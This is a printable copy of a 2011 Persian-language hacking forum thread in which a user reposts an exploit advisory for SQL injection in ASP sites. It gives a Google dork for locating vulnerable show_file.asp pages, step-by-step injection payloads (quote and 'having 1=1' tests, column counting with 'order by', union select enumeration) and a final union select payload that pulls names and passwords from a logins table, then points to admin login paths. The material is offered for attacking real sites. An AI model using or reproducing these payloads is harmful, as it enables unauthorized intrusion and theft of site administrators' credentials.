Parsi Coders
ASP Exploitation SQL Injection Vulnerability - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+--- موضوع: ASP Exploitation SQL Injection Vulnerability (/showthread.php?tid=828)

ASP Exploitation SQL Injection Vulnerability - Amin_Mansouri - 08-30-2011

این باگ sql injection هست برای سایت های asp.net اینم اکسپلویتش تستش زدم خوب چیزیه یه عرب هم نوشتتش اما چیز خیلی ساده ای هست :-)
کد:
=============================================
ASP Exploitation SQL Injection Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#######################################################################
#
# Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..
#
# Date: [ 2010-06-17 ] ..
#
# Author: [ SUp3r00t - heShAm_HaCkEr ] ..
#
# Version: [ Scripts((asp)) ] ..
#
# Google dork: [ show_file.asp?num= ] ..  
#
# TeaM: [ T.v.T ((http://www.pro1tv.com)) ] ..
#
# From: Saudi Arabia ..
#
# Gr33t's: The Master|Al-Kaser20|T.v.T
#
#category: [SQL Injecti0n] ..
#
#######################################################################

# Exploit :  

http://[site]/path/show_file.asp?num={SQL}  
  
# Analysis:

http://[site]/path/show_file.asp?num=Number  

union select ((Number)) login, ((Number)) from logins  
  
========================================================================

# Like:

http://[site]/path/show_file.asp?num=50

http://[site]/path/show_file.asp?num=50'

http://[site]/path/show_file.asp?num=50 having 1=1

((')) <<<<< Keep the label to show a query site involved ..

(( having 1=1 )) << Yes, this revealed the site involved ..

========================================================================  

# Like:1

http://[site]/path/show_file.asp?num=50 order by 20

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins  

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins

union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins

========================================================================

# Final:

http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins

The source of plaque control:-

http://[site]/path/admin "OR" http://[site]/path/login

cpanel: http://[site]/admin "OR" http://[site]/login

========================================================================

./ Sup3r00t@gmail.com
./ pro1tv.com